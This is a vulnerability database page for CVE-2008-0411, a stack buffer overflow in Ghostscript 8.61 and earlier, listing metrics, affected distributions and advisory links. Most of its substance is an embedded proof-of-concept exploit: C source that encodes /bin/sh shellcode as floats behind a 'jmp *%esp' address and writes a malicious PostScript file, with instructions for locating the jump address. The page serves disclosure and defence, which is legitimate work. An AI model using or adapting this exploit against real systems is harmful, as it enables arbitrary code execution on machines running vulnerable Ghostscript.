CVE-2008-0411 : Detail

CVE-2008-0411

Overflow
8.46%V3
Network
2008-02-28
20h00 +00:00
2018-10-15
18h57 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Stack-based buffer overflow in the zseticcspace function in zicc.c in Ghostscript 8.61 and earlier allows remote attackers to execute arbitrary code via a postscript (.ps) file containing a long Range array in a .seticcspace operator.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer
The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.

Metrics

Metrics Score Severity CVSS Vector Source
V2 6.8 AV:N/AC:M/Au:N/C:P/I:P/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 31309

Publication date : 2008-02-26 23h00 +00:00
Author : Will Drewry
EDB Verified : Yes

// source: https://www.securityfocus.com/bid/28017/info Ghostscript is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input. Successfully exploiting this issue may allow remote attackers to execute arbitrary code in the context of the application. Failed exploit attempts will cause denial-of-service conditions. /* A proof of concept exploit for ghostscript 8.61 and earlier. * * Vulnerability discovered by Chris Evans <[email protected]> * Author: [email protected] (Will Drewry) * * Affects: All versions of ghostscript that support .seticcspace. * Tested on: Ubuntu gs-esp-8.15.2.dfsg.0ubuntu1-0ubuntu1 (x86) * Ghostscript 8.61 (2007-11-21) (x86) * * Discussion: * * The vulnerability is in the float vector handling in the seticcspace * function. zicc.c:seticcspace() allows the user to set the number of * expected float values (ncomps) in a vector (range_buff). However, * this vector is statically allocated with the maximum space of 8 * floats. Despite this, the call (dict_floats_array_check_param) to * populate the array of floats is passed a maximum size of ncomps*2. A * large payload will result in overflowing this array. Since all the * values are read in as single precision floating point values, the * payload must be encoded as floats. * * This exploit encodes a basic metasploit-generated exec(/bin/sh) chunk * of shellcode as a list of floats and prepends the address to a "jmp * *%esp" in the /usr/bin/gs. * * This was tested on gs-esp-8.15.2.dfsg.0ubuntu1-0ubuntu1 package in * Ubuntu (on a 32-bit-only kernel) and versions up to 8.61 * (2007-11-21) on other distributions. */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> unsigned char shellcode[] = "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68\x00" "\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x08\x00\x00\x00\x2f\x62\x69" "\x6e\x2f\x73\x68\x00\x57\x53\x89\xe1\xcd\x80"; unsigned char sledpad[] = "\x90\x90\x90"; // maximum sledpad needed unsigned char spacepad[] = "\x41\x41\x41\x41"; // indicator for fun dumps float bytes_to_float(unsigned char *bytes) { float f = 0.0f; memcpy((void *)&f, bytes, sizeof(float)); return f; } unsigned char *build_attack(size_t *attack_size, long a, int padding) { size_t float_size = sizeof(float); size_t shellcode_size = sizeof(shellcode) - 1; size_t sledpad_size = float_size - (shellcode_size % float_size); size_t pad_size = padding * (sizeof(spacepad) - 1); unsigned char *attack = NULL, *padded_shellcode = shellcode; int i,j; // allocate attack space *attack_size = shellcode_size + sledpad_size + sizeof(a) + pad_size; if (*attack_size) attack = malloc(*attack_size); if (attack == NULL) exit(1); fprintf(stderr, "sizeof(float) = %d\n", float_size); fprintf(stderr, "sledpad_size = %d\n", sledpad_size); fprintf(stderr, "pad_size = %d\n", pad_size); fprintf(stderr, "attack_size = %d\n", *attack_size); fprintf(stderr, "address = %p\n", a); // write out request space padding for (i = 0; i < pad_size; i += sizeof(spacepad)-1) memcpy(&attack[i], spacepad, sizeof(spacepad)-1); // write out the address to a "jmp *%esp" memcpy(&attack[i], (void *)&a, sizeof(long)); i += sizeof(long); // pad to ensure that shellcode is divisible by sizeof(float) if (sledpad_size != float_size){ // build a padded a shellcode padded_shellcode = malloc(shellcode_size+sledpad_size); if (padded_shellcode == NULL) exit(1); memcpy(padded_shellcode, sledpad, sledpad_size); memcpy(padded_shellcode+sledpad_size, shellcode, shellcode_size); shellcode_size += sledpad_size; } // Copy in the padded shellcode memcpy(&attack[i], padded_shellcode, shellcode_size); if (shellcode != padded_shellcode) free(padded_shellcode); // That's it. return attack; } int main(int argc, char **argv) { size_t i = 0; size_t attack_size = 0; unsigned char *attack = NULL; // location of jmp *esp in the binary long address = 0x0; if (argc != 3){ fprintf(stderr, "Usage: %s <pad count> <addr of jmp *%%esp>\n", argv[0]); fprintf(stderr, " e.g. %s 15 $((0x8744eff))\n", argv[0]); fprintf(stderr, "An address can be acquired with:\n"); fprintf(stderr, " objdump -D /usr/bin/gs | grep 'jmp[ \\t]\\+\\*%%esp'\n"); return 1; } attack = build_attack(&attack_size, atol(argv[2]), atoi(argv[1])); // output the bad PS printf( "%!PS-Adobe-2.0\n\n" "<< /DataSource currentfile /N 100 /Range [ "); // convert the attack to floats for(i = 0; i <= attack_size - sizeof(float); i += sizeof(float)) printf("%.9g ", bytes_to_float(attack+i)); printf(" ] >> .seticcspace\n"); free(attack); return 0; }

Products Mentioned

Configuraton 0

Debian>>Debian_linux >> Version 3.1

Debian>>Debian_linux >> Version 3.1

Debian>>Debian_linux >> Version 3.1

Debian>>Debian_linux >> Version 3.1

Debian>>Debian_linux >> Version 3.1

Debian>>Debian_linux >> Version 3.1

Debian>>Debian_linux >> Version 3.1

Debian>>Debian_linux >> Version 3.1

Debian>>Debian_linux >> Version 3.1

Debian>>Debian_linux >> Version 3.1

Debian>>Debian_linux >> Version 3.1

Debian>>Debian_linux >> Version 3.1

Debian>>Debian_linux >> Version 3.1

Debian>>Debian_linux >> Version 4.0

Debian>>Debian_linux >> Version 4.0

Debian>>Debian_linux >> Version 4.0

Debian>>Debian_linux >> Version 4.0

Debian>>Debian_linux >> Version 4.0

Debian>>Debian_linux >> Version 4.0

Debian>>Debian_linux >> Version 4.0

Debian>>Debian_linux >> Version 4.0

Debian>>Debian_linux >> Version 4.0

Debian>>Debian_linux >> Version 4.0

Debian>>Debian_linux >> Version 4.0

Debian>>Debian_linux >> Version 4.0

Debian>>Debian_linux >> Version 4.0

Mandrakesoft>>Mandrake_linux >> Version 2007

Mandrakesoft>>Mandrake_linux >> Version 2007.0_x86_64

Mandrakesoft>>Mandrake_linux >> Version 2007.1

Mandrakesoft>>Mandrake_linux >> Version 2007.1

Mandrakesoft>>Mandrake_linux >> Version 2008.0

Mandrakesoft>>Mandrake_linux >> Version 2008.0

Mandrakesoft>>Mandrake_linux_corporate_server >> Version 3.0

Mandrakesoft>>Mandrake_linux_corporate_server >> Version 4.0

Mandrakesoft>>Mandrakesoft_corporate_server >> Version 3.0_x86_64

Mandrakesoft>>Mandrakesoft_corporate_server >> Version 4.0_x86_64

Redhat>>Desktop >> Version 3.0

Redhat>>Desktop >> Version 4.0

Redhat>>Enterprise_linux >> Version 5

Redhat>>Enterprise_linux >> Version as_3

Redhat>>Enterprise_linux >> Version as_4

Redhat>>Enterprise_linux >> Version es_3

Redhat>>Enterprise_linux >> Version es_4

Redhat>>Enterprise_linux >> Version ws_3

Redhat>>Enterprise_linux >> Version ws_4

Redhat>>Enterprise_linux_desktop >> Version 5

Redhat>>Enterprise_linux_desktop_workstation >> Version 5

Rpath>>Rpath_linux >> Version 1

Suse>>Novell_linux_pos >> Version 9

Suse>>Open_suse >> Version 10.2

Suse>>Open_suse >> Version 10.3

Suse>>Suse_linux >> Version 9.0

Suse>>Suse_linux >> Version 10

Suse>>Suse_linux >> Version 10

Suse>>Suse_linux >> Version 10.1

Suse>>Suse_linux >> Version 10.1

Suse>>Suse_linux >> Version 10.1

Suse>>Suse_open_enterprise_server >> Version 0

Ghostscript>>Ghostscript >> Version To (including) 8.61

Configuraton 0

Debian>>Debian_linux >> Version 3.1

Debian>>Debian_linux >> Version 3.1

Debian>>Debian_linux >> Version 3.1

Debian>>Debian_linux >> Version 3.1

Debian>>Debian_linux >> Version 3.1

Debian>>Debian_linux >> Version 3.1

Debian>>Debian_linux >> Version 3.1

Debian>>Debian_linux >> Version 3.1

Debian>>Debian_linux >> Version 3.1

Debian>>Debian_linux >> Version 3.1

Debian>>Debian_linux >> Version 3.1

Debian>>Debian_linux >> Version 3.1

Debian>>Debian_linux >> Version 3.1

Debian>>Debian_linux >> Version 4.0

Debian>>Debian_linux >> Version 4.0

Debian>>Debian_linux >> Version 4.0

Debian>>Debian_linux >> Version 4.0

Debian>>Debian_linux >> Version 4.0

Debian>>Debian_linux >> Version 4.0

Debian>>Debian_linux >> Version 4.0

Debian>>Debian_linux >> Version 4.0

Debian>>Debian_linux >> Version 4.0

Debian>>Debian_linux >> Version 4.0

Debian>>Debian_linux >> Version 4.0

Debian>>Debian_linux >> Version 4.0

Debian>>Debian_linux >> Version 4.0

Ghostscript>>Ghostscript >> Version 0

Ghostscript>>Ghostscript >> Version 8.0.1

Ghostscript>>Ghostscript >> Version 8.15

References

http://secunia.com/advisories/29103
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.ubuntu.com/usn/usn-599-1
Tags : vendor-advisory, x_refsource_UBUNTU
http://www.gentoo.org/security/en/glsa/glsa-200803-14.xml
Tags : vendor-advisory, x_refsource_GENTOO
http://secunia.com/advisories/29154
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/29196
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/29314
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/29101
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/29112
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/29147
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.mandriva.com/security/advisories?name=MDVSA-2008:055
Tags : vendor-advisory, x_refsource_MANDRIVA
http://secunia.com/advisories/29768
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.securitytracker.com/id?1019511
Tags : vdb-entry, x_refsource_SECTRACK
http://www.debian.org/security/2008/dsa-1510
Tags : vendor-advisory, x_refsource_DEBIAN
http://www.redhat.com/support/errata/RHSA-2008-0155.html
Tags : vendor-advisory, x_refsource_REDHAT
http://www.securityfocus.com/bid/28017
Tags : vdb-entry, x_refsource_BID
http://secunia.com/advisories/29135
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/29169
Tags : third-party-advisory, x_refsource_SECUNIA